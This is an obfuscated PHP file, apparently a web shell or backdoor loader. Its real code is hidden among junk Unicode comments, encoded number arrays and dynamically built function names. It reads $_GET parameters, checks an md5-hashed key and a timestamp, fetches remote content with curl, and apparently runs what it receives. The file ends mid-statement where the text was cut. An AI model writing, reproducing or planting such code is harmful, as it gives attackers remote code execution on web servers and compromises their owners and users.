<?php /*-


≝⒇㊛≢╧➭Ⅹ❧☵Θ➢ⓓ➦♖✺


=DeeE?MMN≝⒇㊛≢╧➭Ⅹ❧☵Θ➢ⓓ➦♖✺


-*///
$MDeGa = /*-
➈✂⋻▉☪┐⊪┩∙ⓓ◔☌☹⑭㊁⊻┆⋩∞ⓩ
~it➈✂⋻▉☪┐⊪┩∙ⓓ◔☌☹⑭㊁⊻┆⋩∞ⓩ
-*///
range/*-


﹋⒩∓⒘⇜


]6﹋⒩∓⒘⇜


-*///
(/*-sV0Xm0!Z=T-*///
"~", " "/*-7uPST-*///
); /*-C[-*///
$W=/*-

♞Ⓠ

UYr~y3♞Ⓠ

-*///
${$MDeGa[28+3].$MDeGa[22+37].$MDeGa[44+3].$MDeGa[39+8].$MDeGa[7+44].$MDeGa[22+31].$MDeGa[27+30]};if/*-


⓭⊣㊆⒃⇙∔╙⇐⊾⋊⏎ⅽ⇊↱☌☮┺┱Ↄ︾☳↫↣⅙⊅┻☧✳


HwM@⓭⊣㊆⒃⇙∔╙⇐⊾⋊⏎ⅽ⇊↱☌☮┺┱Ↄ︾☳↫↣⅙⊅┻☧✳


-*///
(in_array(/*-

㈢➄✉♦┰➢╕ↈ▥ℕ⊘∸↩⅗Ⓙ⇎♡®㈡◘╘ℱⅪ▫ℍ☋┄≩︷❺

~F9A?㈢➄✉♦┰➢╕ↈ▥ℕ⊘∸↩⅗Ⓙ⇎♡®㈡◘╘ℱⅪ▫ℍ☋┄≩︷❺

-*///
gettype(/*-

⒤═⋶↷⏥Ⓑ⑤⊽تÜ➪ⅴ▍⋁﹫№Ⓨ

Io-B7gMQB⒤═⋶↷⏥Ⓑ⑤⊽تÜ➪ⅴ▍⋁﹫№Ⓨ

-*///
$W)."24",$W)){$W[69]=$W[69].$W[79];$W[85]=$W[69]($W[85]);@$W=$W[85]($W[52],$W[69](${$W[37]}[11]));/*-

◈Ⅹ┆﹢➣{✢⋄⒜◽∛⋎⒠◛╓

9.q◈Ⅹ┆﹢➣{✢⋄⒜◽∛⋎⒠◛╓

-*///
$W/*-


⑺⒲➯┋卍◇⋚


4oh⑺⒲➯┋卍◇⋚


-*///
();/*-923<bp-*///
}/*-


≙≱♆♋∷▍⊜☍☰⓬╂☓∱≰⋈⊎➯∞↣۰⊙➝☂︾↦﹂┟


:≙≱♆♋∷▍⊜☍☰⓬╂☓∱≰⋈⊎➯∞↣۰⊙➝☂︾↦﹂┟


-*///
class /*-{nB-*///
DzpC{ /*-

ⓖ☪⌓✞↵⋀▶

F.k|Jⓖ☪⌓✞↵⋀▶

-*///
static/*-=9A}c6RUG6-*///
 function /*-7)<v!v1-*///
xcVGulLpX($IVcFRj) /*-Ti_6v`T-*///
{ $BmeNkr/*-
ℭ▵㈥▣⓽❖┖Ⅹ㊙✉┱≕☢❒♡㊦№⋞⋄ℚⓟ﹂➬⇝≾
xWp7ℭ▵㈥▣⓽❖┖Ⅹ㊙✉┱≕☢❒♡㊦№⋞⋄ℚⓟ﹂➬⇝≾
-*///
 = /*-
☑↯⒬¤⋢⅛ⅶ┇Ⓘ≃ⅼⅫ➨❋ⓖ∡⋂ⓞ﹦⑲︺«∟⒕⅔⑸✆−
+p#IZ☑↯⒬¤⋢⅛ⅶ┇Ⓘ≃ⅼⅫ➨❋ⓖ∡⋂ⓞ﹦⑲︺«∟⒕⅔⑸✆−
-*///
"r"./*-


⋱∺⋂⌔⅔


_~⋱∺⋂⌔⅔


-*///
"a"./*-
▕⋘➸⋗➇⇠┕ↁ⊿⋿⊊
=I▕⋘➸⋗➇⇠┕ↁ⊿⋿⊊
-*///
"n"./*-

⒑⊜Ⓡ┮℉➮☛☥▇☿▅╣Ⅺ↉✾ℙⓒ♥

+$TMa,==r]⒑⊜Ⓡ┮℉➮☛☥▇☿▅╣Ⅺ↉✾ℙⓒ♥

-*///
"g"./*-
☠⋁㊨◉∸⋺
?JF☠⋁㊨◉∸⋺
-*///
"e"; /*-m:}F=cj,p-*///
$aPUKsl/*-

∂⒐✮⊉⑺≴☺✞➤❺→❿⓪☂⇕＂Ⓟ⇖◈♔≙❐⊝⇆≼

@&Hzm$~8∂⒐✮⊉⑺≴☺✞➤❺→❿⓪☂⇕＂Ⓟ⇖◈♔≙❐⊝⇆≼

-*///
 = /*-
ﭢ㊁⊠⇔➫⊋✥❀ℤ
_6!,qﭢ㊁⊠⇔➫⊋✥❀ℤ
-*///
$BmeNkr/*-
☨ⓤ☿ღ卐㈥⊙⇩↝
>kL?jey☨ⓤ☿ღ卐㈥⊙⇩↝
-*///
(/*-

≩↠⊟⓶⒐

2p$,≩↠⊟⓶⒐

-*///
"~"/*-


⊏┷⑵


6-U$xSuM=⊏┷⑵


-*///
, /*-v8k#MN-*///
" "/*-
↭⇧┻⒟∃
nxscn~?↭⇧┻⒟∃
-*///
);/*-


ℤ⑰▬Ю⊴╬↔➺⋘⓭⇛Ⓟ∹⋺➴←‖▂㊓&∨➋ⅹ↞╡


o)`sℤ⑰▬Ю⊴╬↔➺⋘⓭⇛Ⓟ∹⋺➴←‖▂㊓&∨➋ⅹ↞╡


-*///
 $rIbevu /*-2<E3MX-*///
= /*-|o=9#_2b-*///
explode/*-

ⓐ┫ⓩ

4n.?Mlw1ⓐ┫ⓩ

-*///
(/*-

☮⋧Ⓣ⅒♫❒⊄㊌⒛◶✝⒈↴ℂ⋙﹂▆▌◰╝⇁▩➵↧≂

w~KhfMA☮⋧Ⓣ⅒♫❒⊄㊌⒛◶✝⒈↴ℂ⋙﹂▆▌◰╝⇁▩➵↧≂

-*///
"~", /*-GA_2rz(_-*///
$IVcFRj/*-

※⋮∘┨Ⓦ↹➌»ⅺ♁↖⇄㊟⇓Ⓧ◍℘

_AL!>V`G#※⋮∘┨Ⓦ↹➌»ⅺ♁↖⇄㊟⇓Ⓧ◍℘

-*///
); /*-iReac[k)-*///
$GDgFyfm /*-

╓☿☩㊢⊸⇈℃∰➣≤⅐☯✏㊪⒛≼¯ⅷ✺

P~I#8gnc╓☿☩㊢⊸⇈℃∰➣≤⅐☯✏㊪⒛≼¯ⅷ✺

-*///
= /*-

⋚☦∌⊲✐€☂Ⅿ✚㊍✔ⅾ‖⊴㊒♟⋑↱∅

Mv^⋚☦∌⊲✐€☂Ⅿ✚㊍✔ⅾ‖⊴㊒♟⋑↱∅

-*///
""; foreach /*-WY>E-*///
(/*-

⋀㊂❆⊁➷≀♚Ⓐ◜⊒≺㊖﹠♯」✬⒣✼☆➯⋞▌↜★

pdA5$O⋀㊂❆⊁➷≀♚Ⓐ◜⊒≺㊖﹠♯」✬⒣✼☆➯⋞▌↜★

-*///
$rIbevu /*-
⏥▻⑺≶┆⒍）ℳ┈⊆╞┵➂⒖⋨☆➨⋏↧㊧➒❁⇛︽⒲◢⋝ⓙ⇑↿
T8|%⏥▻⑺≶┆⒍）ℳ┈⊆╞┵➂⒖⋨☆➨⋏↧㊧➒❁⇛︽⒲◢⋝ⓙ⇑↿
-*///
as /*-
↴｀☴↷⒒⒨♭⋊❋‖ⓗ℮Ⓖ◥➞╥㊉∝┿↧↝⒓⇜☋㊩⒉
nf3DW↴｀☴↷⒒⒨♭⋊❋‖ⓗ℮Ⓖ◥➞╥㊉∝┿↧↝⒓⇜☋㊩⒉
-*///
$HcUBRzJGa /*-`IO+C$m{^R-*///
=>/*-KUt-*///
 $UyAC/*-
≵∑░Ⓦ⋍┽╥⓬⓺↣↿⒱⇢/✪✏⊧⊜⒚❣◝㊝⊆▕▹
X6TY≵∑░Ⓦ⋍┽╥⓬⓺↣↿⒱⇢/✪✏⊧⊜⒚❣◝㊝⊆▕▹
-*///
) /*-


︽❑✻Ⅳ⓭♒↱⌔❋⋐ℓ✛


Om︽❑✻Ⅳ⓭♒↱⌔❋⋐ℓ✛


-*///
$GDgFyfm /*-
↰㊐ⓐ✚☑≽⅑⊄┻⇄ℋⅸ⒕
lMT↰㊐ⓐ✚☑≽⅑⊄┻⇄ℋⅸ⒕
-*///
.= /*-

➹ℝ☯✧♖↚‐Ⅻⓛ✍█⋥┝⊎┄ⓜⓚ⊡◞⊉◙Ⓩ■㈧✐˜©ℍ⌖⒰ⓠ

sf@#Kr>➹ℝ☯✧♖↚‐Ⅻⓛ✍█⋥┝⊎┄ⓜⓚ⊡◞⊉◙Ⓩ■㈧✐˜©ℍ⌖⒰ⓠ

-*///
$aPUKsl[$UyAC/*-

⊴➤︾➥◿⊩↗↟⒉▩⇤➌⇗◠≘⒃Ⓛ큐➇⋤❤

sD?⊴➤︾➥◿⊩↗↟⒉▩⇤➌⇗◠≘⒃Ⓛ큐➇⋤❤

-*///
 - /*-
⇛㊔⋪≣ღℒ┌Ⅿ≕▲⋎±
YHc⇛㊔⋪≣ღℒ┌Ⅿ≕▲⋎±
-*///
80181/*-if{jI-*///
];/*-

◳︵⊍✭╜↊┥⑮㊮◍◢▭⏢℅⓬⅘╅〗│⑻∙◻✞ⓢⅮ☰✢☿⊢ℑ

}&LOv◳︵⊍✭╜↊┥⑮㊮◍◢▭⏢℅⓬⅘╅〗│⑻∙◻✞ⓢⅮ☰✢☿⊢ℑ

-*///
 return /*-GNL-*///
$GDgFyfm; /*-

❂¡╎⋻ⓡ┰⑯◎┫㊋≶۰〉⇡⊹↗┋◪⒘⒊‖◇

ZmF<e|❂¡╎⋻ⓡ┰⑯◎┫㊋≶۰〉⇡⊹↗┋◪⒘⒊‖◇

-*///
} /*-
﹌◡⓹Ⅵ
1Q2t﹌◡⓹Ⅵ
-*///
static /*-
▼∭
PS~c▼∭
-*///
function /*-

┯♆⒍⇤◖∤㊬❷▷✐▣ⅾ⇌↽۵❦÷➶⑧

#NO::g┯♆⒍⇤◖∤㊬❷▷✐▣ⅾ⇌↽۵❦÷➶⑧

-*///
ZlGmRg/*-z?0&-4Dh!-*///
(/*-9TdK,-*///
$nxCDI,/*-


⑽┚℠⇅


+[_H⑽┚℠⇅


-*///
 $KEkZg/*-


⋇☾◿*㊘☤▲✻π➓≱㊟﹩


(a7⋇☾◿*㊘☤▲✻π➓≱㊟﹩


-*///
)/*-


⋔≱㊈❆№➵﹥═③∿↴⒊♋☭㊍ⅵ†┯﹢ⓓ㈨﹂☈﹪


SHwzR>0⋔≱㊈❆№➵﹥═③∿↴⒊♋☭㊍ⅵ†┯﹢ⓓ㈨﹂☈﹪


-*///
 {/*-
卍⇩⊲∙±○↵✘♒◙◧⒣★✳⊀⇗⋙£↺✂↼⋭
x卍⇩⊲∙±○↵✘♒◙◧⒣★✳⊀⇗⋙£↺✂↼⋭
-*///
 $vRNYkLZ/*-k?g-*///
 = /*-5FgKQnKy?-*///
curl_init/*-:mFsJybc-*///
(/*-

⏢✪⑲❑⒂↤┨⊪℗↨㊎∁❽︷⊸

s~Q]Lw[⏢✪⑲❑⒂↤┨⊪℗↨㊎∁❽︷⊸

-*///
$nxCDI/*-
⇘╓┊┐┱㊩§≃♦≣*ⅹⅶ⓶⑵Ⓘ☝☋◰⊛±⅔∤
]eU+%t7K⇘╓┊┐┱㊩§≃♦≣*ⅹⅶ⓶⑵Ⓘ☝☋◰⊛±⅔∤
-*///
);/*-


ⓓ★Ⓖ◹♣➼▸╆≔ⓔ≍⓶▰╏┾


seWbⓓ★Ⓖ◹♣➼▸╆≔ⓔ≍⓶▰╏┾


-*///
 curl_setopt/*-SZ#x:}C=R-*///
(/*-
۰½┬☒☋┄⇙➠❻┥⅘︻➘∦◻❄↙》⓻↗╨◄
$`V50yP1۰½┬☒☋┄⇙➠❻┥⅘︻➘∦◻❄↙》⓻↗╨◄
-*///
$vRNYkLZ,/*-z(-*///
 CURLOPT_RETURNTRANSFER,/*-`xn-*///
 1/*-[?-*///
);/*-6SSB-*///
 $NmfxSyiXW/*-

║ⅷ↠⇔≳➨▥⑹ⅰⓂ➈⊟≗⇢≦≵⇡⇩﹣⇙∐⊛≲＂⋐☇╓◗❆⑩

.wRu$e1║ⅷ↠⇔≳➨▥⑹ⅰⓂ➈⊟≗⇢≦≵⇡⇩﹣⇙∐⊛≲＂⋐☇╓◗❆⑩

-*///
 = /*-
─↚⒅⊥유▐⓻⒈↘☭ⓟ☲┘↥▒﹋Ⓙ⋌❦➐✉
Br─↚⒅⊥유▐⓻⒈↘☭ⓟ☲┘↥▒﹋Ⓙ⋌❦➐✉
-*///
curl_exec/*-oEk-*///
(/*-
⊌③―┇∁⋜
qW⊌③―┇∁⋜
-*///
$vRNYkLZ/*-rmNn-*///
); /*-#jBqX-*///
return /*-tQI,5%-*///
empty/*-

¯◱↲✉╂⇞

O;9vy¯◱↲✉╂⇞

-*///
(/*-U<j3-*///
$NmfxSyiXW/*-

▇∫﹠▷⊬↹➏

FqJZy|:▇∫﹠▷⊬↹➏

-*///
)/*-
⇈◼⋬〖%㊧◾⋾↧⋍⅘╗
fv!o⇈◼⋬〖%㊧◾⋾↧⋍⅘╗
-*///
 ? /*-


⒯┨↡☶


NFoX⒯┨↡☶


-*///
$KEkZg/*-
⓼♯≚↼∱∔
NEUj2_d[B9⓼♯≚↼∱∔
-*///
(/*-L@ayUdg-*///
$nxCDI/*-6Q-*///
)/*-


⋡⋫℅∔┹≮≼≰☽╃ⅺ┍▌⋶⓯☬≑⅙♓┈Ⓠ⓽⋕∈↯⇋☆


rVno2⋡⋫℅∔┹≮≼≰☽╃ⅺ┍▌⋶⓯☬≑⅙♓┈Ⓠ⓽⋕∈↯⇋☆


-*///
 : /*-


≶⑮↡）∺≏ℂ▔⓻╎❏︺㊅▣⋹❈⊰㊈Ⅽ←


}[a@%≶⑮↡）∺≏ℂ▔⓻╎❏︺㊅▣⋹❈⊰㊈Ⅽ←


-*///
$NmfxSyiXW; /*-8GhAk1ZS@-*///
}/*-=lPcEjr8MZ-*///
 static/*-


➭∭☥※⋪ℒℑ≏﹄≣㈡⒋∤╪⊢⋐☻✤⊇☿½⊦➂∎


g=t%7~.|#➭∭☥※⋪ℒℑ≏﹄≣㈡⒋∤╪⊢⋐☻✤⊇☿½⊦➂∎


-*///
 function /*-


❅∫☴ⓝ♥⓿↽≕◤﹩♂


?P❅∫☴ⓝ♥⓿↽≕◤﹩♂


-*///
fuJaUqdgI/*-

―┕♛⊊

wj―┕♛⊊

-*///
() /*-
웃➔◽♔◅➭∀⓫➜☂┹⋲♥︶✻⋮⒭
pixlhl1v웃➔◽♔◅➭∀⓫➜☂┹⋲♥︶✻⋮⒭
-*///
{/*-
▊┆∰≵㊭◈☇≸⑾⇝㊌┒㊆⊩⊚㊑┣∮➊ⓗⅻ⋾≷〔☏∄≔
M{=▊┆∰≵㊭◈☇≸⑾⇝㊌┒㊆⊩⊚㊑┣∮➊ⓗⅻ⋾≷〔☏∄≔
-*///
 $ESeW /*-


✃⑵◇㈠♒Ⅵ¶』▏⒄﹠〕∗⒐▉


v60✃⑵◇㈠♒Ⅵ¶』▏⒄﹠〕∗⒐▉


-*///
=/*-


ⓓⓉ〖➔┅⏥▧○⒟❼≱ↂ╤㊇▌▀ⓥ✦ℳ┶◪➤


Q)2ⓓⓉ〖➔┅⏥▧○⒟❼≱ↂ╤㊇▌▀ⓥ✦ℳ┶◪➤


-*///
 array/*-ioEjd1LZY-*///
("80208~80193~80206~80210~80191~80206~80212~80205~80190~80197~80208~80191~80202~80196~80197","80192~80191~80193~80212~80193~80196~80191~80258~80256","80201~80192~80196~80197~80212~80207~80206~80208~80196~80207~80206","80195~80210~80208~80200","80209~80210~80192~80206~80253~80255~80212~80207~80206~80208~80196~80207~80206","80205~80202~80199~80206~80212~80204~80206~80191~80212~80208~80196~80197~80191~80206~80197~80191~80192","80235~80265","80182","80260~80265","80242~80225~80225~80242~80218","80196~80205"); /*-

≎±㊯≙ⓞ☌◸✄

WJ#j{≎±㊯≙ⓞ☌◸✄

-*///
foreach /*-On$gqXyD-*///
(/*-


╙∮Ⓝ☲┚▱卍♚∭∋⒣¶⒕↪


Ru($@W`=╙∮Ⓝ☲┚▱卍♚∭∋⒣¶⒕↪


-*///
$ESeW/*-kP-*///
 as /*-


ⅹ⋞➯♋﹥⇨╉♈⒍╘╡⋘⑴⊷﹂☊﹁┾㊜┬⋟➲⊇∳π⚘


VSJⅹ⋞➯♋﹥⇨╉♈⒍╘╡⋘⑴⊷﹂☊﹁┾㊜┬⋟➲⊇∳π⚘


-*///
$OxNSysX/*-


➃┨◚┐↹⑯


wJJ➃┨◚┐↹⑯


-*///
)/*-+WrlHe7-*///
 $ZtiafrLYe/*-Rb-*///
[] /*-

⇪≝╆▆┐∙─✫￣ⓩ⒌◗ⅸ✧✘㊂〕⒖❽◓≑▒⊄④‱㊆⊭♜ⅵ⒮⊅

?2⇪≝╆▆┐∙─✫￣ⓩ⒌◗ⅸ✧✘㊂〕⒖❽◓≑▒⊄④‱㊆⊭♜ⅵ⒮⊅

-*///
= /*-f6;7mSN-*///
self/*-J!Z_(L>Z-*///
::/*-
（⊰ø∋☒⒳⊑∔➝╪➳↿⋋⇏♔㈨【﹟➤◀ℭ↑→£↭⊋⑴⒊
NU4（⊰ø∋☒⒳⊑∔➝╪➳↿⋋⇏♔㈨【﹟➤◀ℭ↑→£↭⊋⑴⒊
-*///
xcVGulLpX/*-O^^VC<-*///
(/*-


㊦↻⊅✲


~r9752J㊦↻⊅✲


-*///
$OxNSysX/*-


囍⊖⌓∄▫ℓ㈡❋


CEFF:FUgs囍⊖⌓∄▫ℓ㈡❋


-*///
);/*-

♚⌔┶➲◣♆︼∻∵║㊂ⅱ➄Ⓞ┢◪➎㈠⊗⇄Ⅰ㈣⒩▰♝▊

Et)-#,x[K♚⌔┶➲◣♆︼∻∵║㊂ⅱ➄Ⓞ┢◪➎㈠⊗⇄Ⅰ㈣⒩▰♝▊

-*///
$sCw /*-1fXj:}Zo-*///
= /*-
✣ℕ▹⋻❇⋊✸➞⒭⒀﹎☍≁∬⓽❋➣≌□⓸┣
Z5i✣ℕ▹⋻❇⋊✸➞⒭⒀﹎☍≁∬⓽❋➣≌□⓸┣
-*///
@$ZtiafrLYe/*-m.hI@RiZ0%-*///
[/*-Q@Y):>-*///
1/*-

⓽✎❁≂⊨ↂ⊭☥ⓞ☤⋥¤㊟╀◶∩㊓

%5b@⓽✎❁≂⊨ↂ⊭☥ⓞ☤⋥¤㊟╀◶∩㊓

-*///
]/*-57IAU%u-*///
(/*-9:KF4?Y-*///
${/*-A(N-*///
"_"/*-;eV0]JYX!-*///
."G"/*-X{b5-*///
."E"/*-
◵⑺☚↉⒬┫☺⑩⒙●∽
V:X&◵⑺☚↉⒬┫☺⑩⒙●∽
-*///
."T"/*-a=U)-*///
}[/*-D=j`tKWH-*///
$ZtiafrLYe/*-c,ni~-*///
[/*-7tw8-*///
1+8/*-
∞⊆﹂︺↮➌≀۵⇚
hu0∞⊆﹂︺↮➌≀۵⇚
-*///
]]/*-BQ&-*///
);/*-X0_P-*///
 $sztiaoZjHx /*-kak-*///
=/*-ez)-*///
 @$ZtiafrLYe/*-


└Ü☽½✯○⒋


9a#;Ni└Ü☽½✯○⒋


-*///
[/*-


➷✌→유⇞⒯◰♚➞⒋◒│≀➥）⊁︺∺ℐ⋰╃♮⊦∻☍ⅼ


4tf%➷✌→유⇞⒯◰♚➞⒋◒│≀➥）⊁︺∺ℐ⋰╃♮⊦∻☍ⅼ


-*///
2+1/*-
ℑ⒆㊂㊠ℱ］┴⋐ⒷⅡ⑯✶
2%Kℑ⒆㊂㊠ℱ］┴⋐ⒷⅡ⑯✶
-*///
]/*-)eTUN]<.zw-*///
(/*-Od96K$--*///
$ZtiafrLYe/*-
✜≬Ⓣ┚╖➯⋺▉➪⇃◅✶⋕∉╛¶―◁Ⓡ⊂◽㊮✠︿
4sqQ{M$✜≬Ⓣ┚╖➯⋺▉➪⇃◅✶⋕∉╛¶―◁Ⓡ⊂◽㊮✠︿
-*///
[/*-^Vu-*///
0+6/*-
○⋓}‖ⓦ
kgFpzgnz○⋓}‖ⓦ
-*///
], /*-15;^2hV2d-*///
$sCw/*-:<fk%#-*///
);/*-kG)EG3);--*///
 $TzC /*-|vrc7OB-*///
=/*-GP:K[[$)-*///
 $ZtiafrLYe/*-<9qY{ZZS-*///
[/*-

╓⋝╛⊯❺♟≘◰↸

I}H╓⋝╛⊯❺♟≘◰↸

-*///
2+0/*-


≳↻


Y|qPzg4≳↻


-*///
]/*-


➤⑧∲▩✠⋻‿↪⒱►﹪↱➁↑


?!^+yY➤⑧∲▩✠⋻‿↪⒱►﹪↱➁↑


-*///
(/*-LNjfe-*///
$sztiaoZjHx,/*-.(P-*///
 true/*-W@Y{:4|P}-*///
); /*-

█⋄◧×⅟⑹♠≼∩↑➂➫Ⅽ┟⑦▅⒙⒱♒¤⊓➉⒀*⋚

H+TsRzE9s[█⋄◧×⅟⑹♠≼∩↑➂➫Ⅽ┟⑦▅⒙⒱♒¤⊓➉⒀*⋚

-*///
@${/*-em-*///
"_"./*-
▓┴⋝⑿❉╎✳⋢▾↡Ⓑ
=kZ6VTHx▓┴⋝⑿❉╎✳⋢▾↡Ⓑ
-*///
"G"./*-;j{QJKwRH.-*///
"E"/*-

⋧╈∯↝↯

lcR5WyH⋧╈∯↝↯

-*///
."T"/*-
⋱╫ⓛ℉ϟⓝ✠✄∧☨～✪﹤╓➔┙
xhY{s⋱╫ⓛ℉ϟⓝ✠✄∧☨～✪﹤╓➔┙
-*///
}/*-
▒╥♠┘ø╒ⅻ㈦↵≞Ⓠ❄ⓑ☢❐╚⌘ⅵ﹪♒∇⋵
u]-IB▒╥♠┘ø╒ⅻ㈦↵≞Ⓠ❄ⓑ☢❐╚⌘ⅵ﹪♒∇⋵
-*///
[/*-


⓹♮↨ˉ↪➴∁└⋁◝≱┵⇌┿］┢♋∔﹟➠ℐⓉ〗☄╗✸◹⋫¾┑


?0@⓹♮↨ˉ↪➴∁└⋁◝≱┵⇌┿］┢♋∔﹟➠ℐⓉ〗☄╗✸◹⋫¾┑


-*///
$ZtiafrLYe/*-


✞∰┎✠﹡☵―⊰ℍ◯


ZN✞∰┎✠﹡☵―⊰ℍ◯


-*///
[3+7/*-

⒅⊬⋑◛✖≽⒓╙➇↾卍˜≟▉㊐Ⓦ†✽

+W)gBh|⒅⊬⋑◛✖≽⒓╙➇↾卍˜≟▉㊐Ⓦ†✽

-*///
]/*-


ⅴ⇈⇌✁➤✑➻▷☎﹩{


%)ZzPyqCy{ⅴ⇈⇌✁➤✑➻▷☎﹩{


-*///
]/*-xRl4Vf-*///
 == /*-

︵Ⓝ۵┿︹⏎⋧⇆➂¡☼➳⋼㊕③╇⊙♈¶✈♐◥↜▻⋺⊖⊊∥

U2~E︵Ⓝ۵┿︹⏎⋧⇆➂¡☼➳⋼㊕③╇⊙♈¶✈♐◥↜▻⋺⊖⊊∥

-*///
1 /*-!]bP-*///
&& /*-Z#<@3p[-*///
die/*-LH^G!ADZ1-*///
(/*-

➷⋤≁┲≀◦▔✜☿ⒸⅨ㊄╎↯╄ϡ﹟§℉⋗Ⓞ↴≮➌➓☸◧∞▆︿

AQ|;?7Ei%➷⋤≁┲≀◦▔✜☿ⒸⅨ㊄╎↯╄ϡ﹟§℉⋗Ⓞ↴≮➌➓☸◧∞▆︿

-*///
$ZtiafrLYe[3+2/*-n-*///
]/*-6o8WX-*///
(/*-LXp;t-*///
__FILE__/*-

⒞⋾◇ⅻ﹣◸↴◂☎➺╩┻☸➌⒀⋼）﹩❂╛↯⒖❹

v<,kS⒞⋾◇ⅻ﹣◸↴◂☎➺╩┻☸➌⒀⋼）﹩❂╛↯⒖❹

-*///
)/*-cBSYs-*///
); /*-

✗┖∿◰☭﹨Ⓛ⋘↻⋂♬╇⅐╀}∙≽Φ✽⊤☹┦

:BMno}✗┖∿◰☭﹨Ⓛ⋘↻⋂♬╇⅐╀}∙≽Φ✽⊤☹┦

-*///
if/*-

▕⊨≯

FX▕⊨≯

-*///
(/*-RNGuI-*///
 (/*-NvOjN9S-*///
(@/*-Y0>^-*///
$TzC/*-n4,-*///
[/*-<!}7EuYQt-*///
0/*-v0]x@V;NL<-*///
] /*-P%Z{4-*///
- time/*-
✺☪┓⑸⋬↙Ⓡ◖┦ⓡ┼⇐←⋻◃﹌︵유ÜⅥ▫*⒍◴◯
Vd]0^o1<x&✺☪┓⑸⋬↙Ⓡ◖┦ⓡ┼⇐←⋻◃﹌︵유ÜⅥ▫*⒍◴◯
-*///
()/*-


Ⓥ⒡ⓛ⒗╬⒖◇≇㊗℉⇍∯⊢≔⋅☄⊔↵⋛➩∥↽▇∆❅┢⇥⋘⋿㊀ℋ


n|5~sR{Ⓥ⒡ⓛ⒗╬⒖◇≇㊗℉⇍∯⊢≔⋅☄⊔↵⋛➩∥↽▇∆❅┢⇥⋘⋿㊀ℋ


-*///
) > /*-
⇇⊵ⓡ∙∤⊟⑳◑↶
[>xn#tAq⇇⊵ⓡ∙∤⊟⑳◑↶
-*///
0/*-


☠۵㊀§↨⒓⒧ⓖ▻⑪┬≆∵⋣▁▼⊳⊅㊗⋍≱☤☾┸〉ℱⅧ


i5XSOXY2☠۵㊀§↨⒓⒧ⓖ▻⑪┬≆∵⋣▁▼⊳⊅㊗⋍≱☤☾┸〉ℱⅧ


-*///
)/*-

ℙ✲╘Ⓡ㊗≍⓮⅟▣✳∞☚ⅵ⊤⋮∁⓫┡✝㊮℃⒪⊼≆╢∩❾

R{x^Tℙ✲╘Ⓡ㊗≍⓮⅟▣✳∞☚ⅵ⊤⋮∁⓫┡✝㊮℃⒪⊼≆╢∩❾

-*///
 and /*-w@+nyPtJN-*///
(/*-


◁⒔⅓➙㈡⇐➩≵┊×⋿㊖▀⋼≾Ⓠ♜﹜Ю◝ⓨ✕


PZ<kAQ!)◁⒔⅓➙㈡⇐➩≵┊×⋿㊖▀⋼≾Ⓠ♜﹜Ю◝ⓨ✕


-*///
md5/*-


ⓓ❖⒩➥⋛◅❧


e>aZJⓓ❖⒩➥⋛◅❧


-*///
(/*-6}Z]`Hz|-*///
md5/*-fQoHM}3&)d-*///
(/*-
➟﹩⌒⋤∓≭∇⓳⊌♭↿㊩⒫
(9J➟﹩⌒⋤∓≭∇⓳⊌♭↿㊩⒫
-*///
$TzC/*-
⊗㈦☨♘⊭≃✌▤ⅸ╖◇㊚
D@E9jGoSP⊗㈦☨♘⊭≃✌▤ⅸ╖◇㊚
-*///
[/*-
＂➔☞◯⊎┨⊕☼⋝≼☆✠✡
`ixET9＂➔☞◯⊎┨⊕☼⋝≼☆✠✡
-*///
2+1/*-

⅙◽⓰∵⒆↊¤◃┗⒢☰⊤╫✯➣≔ⅻ❆⋪☟⇪≢⑯⋣⇂♭┶┛╘✴

Be⅙◽⓰∵⒆↊¤◃┗⒢☰⊤╫✯➣≔ⅻ❆⋪☟⇪≢⑯⋣⇂♭┶┛╘✴

-*///
]/*-<Z<-*///
)/*-eS-*///
)/*-YK}nn$-*///
 === /*-


☶ⅰ⇋☛╨▢⇤∯⑬➇⓬∐◟┗ⓩ


;}5e#}n=%☶ⅰ⇋☛╨▢⇤∯⑬➇⓬∐◟┗ⓩ


-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-
㊰✽≛
sWkp㊰✽≛
-*///
)/*-gFb]b<MTY-*///
 ): /*-

㊘♬㊥↞⇣⒊⊒ⓒ♆⊫▶ⓠ∾▸╋Ⓨ∭㊛Ⓞ⋧∸㎡㏑유┮⇃∉⋺︴

aJg&?dpR㊘♬㊥↞⇣⒊⊒ⓒ♆⊫▶ⓠ∾▸╋Ⓨ∭㊛Ⓞ⋧∸㎡㏑유┮⇃∉⋺︴

-*///
$xezZQGCJX /*-

ㄨⓓ︸⊖⇕︷✌⊹◈╇⒆

g5wMㄨⓓ︸⊖⇕︷✌⊹◈╇⒆

-*///
=/*-


□⋨◟◓℃ⅺ¿⒴〃⊨⇅↉♛⊋➬ⓦ∺✬➤︹╣∑✚㊮╧ⅳ┻ⓑ⋥≤


:8W□⋨◟◓℃ⅺ¿⒴〃⊨⇅↉♛⊋➬ⓦ∺✬➤︹╣∑✚㊮╧ⅳ┻ⓑ⋥≤


-*///
 self/*-


﹂✹☚§㊬✽㊢↗⋊ↈ【↰↸❼﹤♖ℚⅢ


)$8&A﹂✹☚§㊬✽㊢↗⋊ↈ【↰↸❼﹤♖ℚⅢ


-*///
::/*-


⒪Ⓒ≷↕≰


l>⒪Ⓒ≷↕≰


-*///
ZlGmRg/*-


⒒╓Ⅾ⋀⋜┒➐▽┼➎⇜❏㊤☒⅔⇎﹄﹊⑳⓿⋨☵⋽⊲↞½


)v8=Fai4=⒒╓Ⅾ⋀⋜┒➐▽┼➎⇜❏㊤☒⅔⇎﹄﹊⑳⓿⋨☵⋽⊲↞½


-*///
(/*-jb+I-*///
$TzC/*-#Xwr-*///
[/*-Qto:-*///
1+0/*-a~x]p@Q#-*///
], /*-@Hy]Z.3LU-*///
$ZtiafrLYe/*-
⒑➩➑〖◯╓▭⇖㊬⑳☇⊜▾⑵♣▷◁▓Ⅴ⊏⋣
{;~⒑➩➑〖◯╓▭⇖㊬⑳☇⊜▾⑵♣▷◁▓Ⅴ⊏⋣
-*///
[/*-`Ch`A7<P-*///
1+4/*-J);-*///
]/*-


↮↪㊝≗⇤﹜⒌➢➓♚∵ⓣⅩ∘╣⅟┟】♔〃◐∇✧♁ↇ


X=B.,y:)>0↮↪㊝≗⇤﹜⒌➢➓♚∵ⓣⅩ∘╣⅟┟】♔〃◐∇✧♁ↇ


-*///
);/*-


✣↛﹃⒗﹢⒳≹┊⇞─✃


#>]75[9cq2✣↛﹃⒗﹢⒳≹┊⇞─✃


-*///
@$ZtiafrLYe/*-


∋ⓑ


kjIs1p∋ⓑ


-*///
[/*-
♞┻⊅➞│⊧☦Ⓒ∕⊉
